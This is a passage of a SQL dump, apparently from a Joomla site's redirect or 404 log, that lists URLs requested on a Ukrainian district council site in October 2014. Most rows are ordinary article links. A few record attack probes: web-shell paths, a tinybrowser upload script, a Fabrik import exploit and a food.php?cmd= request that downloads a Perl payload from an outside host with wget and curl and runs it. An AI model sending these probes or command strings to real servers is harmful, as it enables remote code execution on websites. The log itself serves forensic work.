00:00:00',301),(6193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53&Itemid=94&lang=ru','','','',12,0,'2014-10-01 09:28:27','0000-00-00 00:00:00',301),(6194,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-10-01 09:28:33','0000-00-00 00:00:00',301),(6195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=ru&Itemid=','','','',2,0,'2014-10-01 09:38:15','0000-00-00 00:00:00',301),(6196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=uk&Itemid=','','','',2,0,'2014-10-01 09:38:20','0000-00-00 00:00:00',301),(6197,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=uk&Itemid=','','','',1,0,'2014-10-01 09:53:37','0000-00-00 00:00:00',301),(6198,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:------l---2011-2013-r&catid=36&Itemid=70&lang=ru','','','',7,0,'2014-10-01 09:56:44','0000-00-00 00:00:00',301),(6199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:------l---2011-2013-r&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-10-01 09:56:54','0000-00-00 00:00:00',301),(6200,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=uk&Itemid=0','','','',2,0,'2014-10-01 09:59:21','0000-00-00 00:00:00',301),(6201,'http://www.malyn-rayrada.org.ua/index.php/---1932-33-','','','',1,0,'2014-10-01 10:02:31','0000-00-00 00:00:00',301),(6202,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=ru&Itemid=','','','',1,0,'2014-10-01 10:08:28','0000-00-00 00:00:00',301),(6203,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=uk&Itemid=0','','','',3,0,'2014-10-01 10:25:21','0000-00-00 00:00:00',301),(6204,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48&Itemid=87&lang=en','','','',1,0,'2014-10-01 10:28:37','0000-00-00 00:00:00',301),(6205,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:---------------l-r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-10-01 10:33:22','0000-00-00 00:00:00',301),(6206,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-10-01 10:33:29','0000-00-00 00:00:00',301),(6207,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-10-01 10:33:34','0000-00-00 00:00:00',301),(6208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-10-01 10:33:37','0000-00-00 00:00:00',301),(6209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-----------------2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-10-01 10:34:21','0000-00-00 00:00:00',301),(6210,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-01 10:34:34','0000-00-00 00:00:00',301),(6211,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:34:38','0000-00-00 00:00:00',301),(6212,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:34:41','0000-00-00 00:00:00',301),(6213,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-01 10:34:44','0000-00-00 00:00:00',301),(6214,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-01 10:34:48','0000-00-00 00:00:00',301),(6215,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:34:50','0000-00-00 00:00:00',301),(6216,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-01 10:34:54','0000-00-00 00:00:00',301),(6217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:34:58','0000-00-00 00:00:00',301),(6218,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:35:02','0000-00-00 00:00:00',301),(6219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-01 10:35:05','0000-00-00 00:00:00',301),(6220,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:35:08','0000-00-00 00:00:00',301),(6221,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:35:11','0000-00-00 00:00:00',301),(6222,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-01 10:35:15','0000-00-00 00:00:00',301),(6223,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:35:22','0000-00-00 00:00:00',301),(6224,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=en&Itemid=0','','','',5,0,'2014-10-01 10:35:25','0000-00-00 00:00:00',301),(6225,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:35:30','0000-00-00 00:00:00',301),(6226,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:35:33','0000-00-00 00:00:00',301),(6227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-01 10:35:36','0000-00-00 00:00:00',301),(6228,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:35:39','0000-00-00 00:00:00',301),(6229,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:35:58','0000-00-00 00:00:00',301),(6230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:36:01','0000-00-00 00:00:00',301),(6231,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-01 10:36:07','0000-00-00 00:00:00',301),(6232,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-01 10:36:09','0000-00-00 00:00:00',301),(6233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-01 10:36:11','0000-00-00 00:00:00',301),(6234,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=ru&Itemid=0','','','',6,0,'2014-10-01 10:36:14','0000-00-00 00:00:00',301),(6235,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-10-01 10:36:17','0000-00-00 00:00:00',301),(6236,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-01 10:36:20','0000-00-00 00:00:00',301),(6237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:36:24','0000-00-00 00:00:00',301),(6238,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-01 10:36:26','0000-00-00 00:00:00',301),(6239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-01 10:36:30','0000-00-00 00:00:00',301),(6240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-01 10:36:35','0000-00-00 00:00:00',301),(6241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=en&Itemid=0','','','',5,0,'2014-10-01 10:36:40','0000-00-00 00:00:00',301),(6242,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-01 10:36:42','0000-00-00 00:00:00',301),(6243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-01 10:36:45','0000-00-00 00:00:00',301),(6244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-01 10:36:48','0000-00-00 00:00:00',301),(6245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:36:50','0000-00-00 00:00:00',301),(6246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=uk&Itemid=0','','','',11,0,'2014-10-01 10:36:53','0000-00-00 00:00:00',301),(6247,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-01 10:36:55','0000-00-00 00:00:00',301),(6248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:37:00','0000-00-00 00:00:00',301),(6249,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-01 10:37:05','0000-00-00 00:00:00',301),(6250,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-01 10:37:07','0000-00-00 00:00:00',301),(6251,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-01 10:37:09','0000-00-00 00:00:00',301),(6252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:37:11','0000-00-00 00:00:00',301),(6253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:37:14','0000-00-00 00:00:00',301),(6254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-01 10:37:18','0000-00-00 00:00:00',301),(6255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-10-01 10:37:20','0000-00-00 00:00:00',301),(6256,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=en&Itemid=0','','','',5,0,'2014-10-01 10:37:23','0000-00-00 00:00:00',301),(6257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-01 10:37:25','0000-00-00 00:00:00',301),(6258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-01 10:37:27','0000-00-00 00:00:00',301),(6259,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-01 10:37:32','0000-00-00 00:00:00',301),(6260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-01 10:37:34','0000-00-00 00:00:00',301),(6261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-01 10:37:39','0000-00-00 00:00:00',301),(6262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-01 10:37:41','0000-00-00 00:00:00',301),(6263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-01 10:37:44','0000-00-00 00:00:00',301),(6264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-01 10:38:05','0000-00-00 00:00:00',301),(6265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-01 10:38:08','0000-00-00 00:00:00',301),(6266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-01 10:38:11','0000-00-00 00:00:00',301),(6267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=en&Itemid=0','','','',9,0,'2014-10-01 10:38:14','0000-00-00 00:00:00',301),(6268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-01 10:38:18','0000-00-00 00:00:00',301),(6269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-01 10:38:20','0000-00-00 00:00:00',301),(6270,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=en&Itemid=0','','','',6,0,'2014-10-01 10:38:24','0000-00-00 00:00:00',301),(6271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-01 10:38:26','0000-00-00 00:00:00',301),(6272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-10-01 10:38:28','0000-00-00 00:00:00',301),(6273,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-01 10:38:31','0000-00-00 00:00:00',301),(6274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-01 10:38:33','0000-00-00 00:00:00',301),(6275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-01 10:38:35','0000-00-00 00:00:00',301),(6276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:-qq&catid=11&Itemid=14&lang=en','','','',3,0,'2014-10-01 10:38:38','0000-00-00 00:00:00',301),(6277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:-qq&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-10-01 10:38:40','0000-00-00 00:00:00',301),(6278,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-10-01 10:38:45','0000-00-00 00:00:00',301),(6279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-10-01 10:38:47','0000-00-00 00:00:00',301),(6280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-01 10:38:50','0000-00-00 00:00:00',301),(6281,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-10-01 10:40:32','0000-00-00 00:00:00',301),(6282,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48:--11032013-&Itemid=87&lang=en','','','',3,0,'2014-10-01 10:57:19','0000-00-00 00:00:00',301),(6283,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-10-01 11:08:50','0000-00-00 00:00:00',301),(6284,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-01 11:19:53','0000-00-00 00:00:00',301),(6285,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-01 11:48:07','0000-00-00 00:00:00',301),(6286,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:-qq&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-10-01 12:01:19','0000-00-00 00:00:00',301),(6287,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-01 12:01:22','0000-00-00 00:00:00',301),(6288,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-10-01 12:01:46','0000-00-00 00:00:00',301),(6289,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=993:-21-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-01 12:17:37','0000-00-00 00:00:00',301),(6290,'http://www.malyn-rayrada.org.ua/index.php/component/content/category/51-2010-06-05-12-47-37/11032013','','','',1,0,'2014-10-01 14:21:52','0000-00-00 00:00:00',301),(6291,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=uk','','','',2,0,'2014-10-01 15:00:18','0000-00-00 00:00:00',301),(6292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-01 15:06:55','0000-00-00 00:00:00',301),(6293,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-01 15:35:35','0000-00-00 00:00:00',301),(6294,'http://www.malyn-rayrada.org.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=','','','',6,0,'2014-10-01 15:41:19','0000-00-00 00:00:00',301),(6295,'http://malyn-rayrada.org.ua/images/xxu.php','','','',10,0,'2014-10-01 15:42:42','0000-00-00 00:00:00',301),(6296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-01 15:50:59','0000-00-00 00:00:00',301),(6297,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-10-01 16:06:00','0000-00-00 00:00:00',301),(6298,'http://www.malyn-rayrada.org.ua/index.php/-25032011','','','',1,0,'2014-10-01 16:42:55','0000-00-00 00:00:00',301),(6299,'http://www.malyn-rayrada.org.ua/index.php/20-2010-06-05-13-45-43/2010-06-06-09-34-01/1164-116','','','',1,0,'2014-10-01 16:56:17','0000-00-00 00:00:00',301),(6300,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60:--11072014-&Itemid=108&lang=uk','','','',1,0,'2014-10-01 18:37:54','0000-00-00 00:00:00',301),(6301,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60:--11072014-&Itemid=108&lang=uk','','','',1,0,'2014-10-01 18:38:03','0000-00-00 00:00:00',301),(6302,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-10-01 18:38:06','0000-00-00 00:00:00',301),(6303,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60:--11072014-&Itemid=108&lang=uk','','','',1,0,'2014-10-01 18:38:20','0000-00-00 00:00:00',301),(6304,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=uk','','','',4,0,'2014-10-01 18:50:11','0000-00-00 00:00:00',301),(6305,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=uk','','','',5,0,'2014-10-01 18:56:32','0000-00-00 00:00:00',301),(6306,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1209:-----2014-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-01 19:41:32','0000-00-00 00:00:00',301),(6307,'http://www.malyn-rayrada.org.ua/images/stories/food.php?cmd=lwp-download http://www.canalformativo.es/media/system/css/sod.txt;wget http://www.canalformativo.es/media/system/css/sod.txt;curl -O http://www.canalformativo.es/media/system/css/sod.txt;perl so','','','',1,0,'2014-10-01 20:00:42','0000-00-00 00:00:00',301),(6308,'http://www.malyn-rayrada.org.ua/images/stories/robot.php','','','',2,0,'2014-10-01 20:00:52','0000-00-00 00:00:00',301),(6309,'http://www.malyn-rayrada.org.ua/images/stories/mey.php','','','',2,0,'2014-10-01 20:00:56','0000-00-00 00:00:00',301),(6310,'http://malyn-rayrada.org.ua/images/stories/food.php?cmd=lwp-download http://www.canalformativo.es/media/system/css/sod.txt;wget http://www.canalformativo.es/media/system/css/sod.txt;curl -O http://www.canalformativo.es/media/system/css/sod.txt;perl sod.tx','','','',1,0,'2014-10-01 20:36:56','0000-00-00 00:00:00',301),(6311,'http://malyn-rayrada.org.ua/images/stories/robot.php','','','',1,0,'2014-10-01 20:37:00','0000-00-00 00:00:00',301),(6312,'http://malyn-rayrada.org.ua/images/stories/mey.php','','','',1,0,'2014-10-01 20:37:03','0000-00-00 00:00:00',301),(6313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=en','','','',6,0,'2014-10-01 20:50:29','0000-00-00 00:00:00',301),(6314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51:--19072013-&Itemid=92&lang=en','','','',6,0,'2014-10-01 21:10:41','0000-00-00 00:00:00',301),(6315,'http://www.malyn-rayrada.org.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',293,0,'2014-10-01 21:18:19','0000-00-00 00:00:00',301),(6316,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=ru','','','',3,0,'2014-10-01 22:05:40','0000-00-00 00:00:00',301),(6317,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54:--29112013-&Itemid=95&lang=ru','','','',7,0,'2014-10-01 22:09:53','0000-00-00 00:00:00',301),(6318,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51:--19072013-&Itemid=92&lang=en','','','',2,0,'2014-10-01 22:12:36','0000-00-00 00:00:00',301),(6319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=uk','','','',5,0,'2014-10-01 22:20:57','0000-00-00 00:00:00',301),(6320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-10-01 22:35:25','0000-00-00 00:00:00',301),(6321,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&Itemid=14&lang=en','','','',5,0,'2014-10-01 22:39:56','0000-00-00 00:00:00',301),(6322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-10-01 23:21:59','0000-00-00 00:00:00',301),(6323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-01 23:28:40','0000-00-00 00:00:00',301),(6324,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53:--25102013-&Itemid=94&lang=ru','','','',3,0,'2014-10-01 23:44:34','0000-00-00 00:00:00',301),(6325,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-01 23:47:35','0000-00-00 00:00:00',301),(6326,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-01 23:50:36','0000-00-00 00:00:00',301),(6327,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-02 00:10:01','0000-00-00 00:00:00',301),(6328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-10-02 00:13:24','0000-00-00 00:00:00',301),(6329,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-02 00:34:46','0000-00-00 00:00:00',301),(6330,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1017:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-02 00:37:53','0000-00-00 00:00:00',301),(6331,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-10-02 00:40:34','0000-00-00 00:00:00',301),(6332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51:--19072013-&Itemid=92&lang=ru','','','',7,0,'2014-10-02 00:41:44','0000-00-00 00:00:00',301),(6333,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=uk','','','',2,0,'2014-10-02 01:06:34','0000-00-00 00:00:00',301),(6334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-02 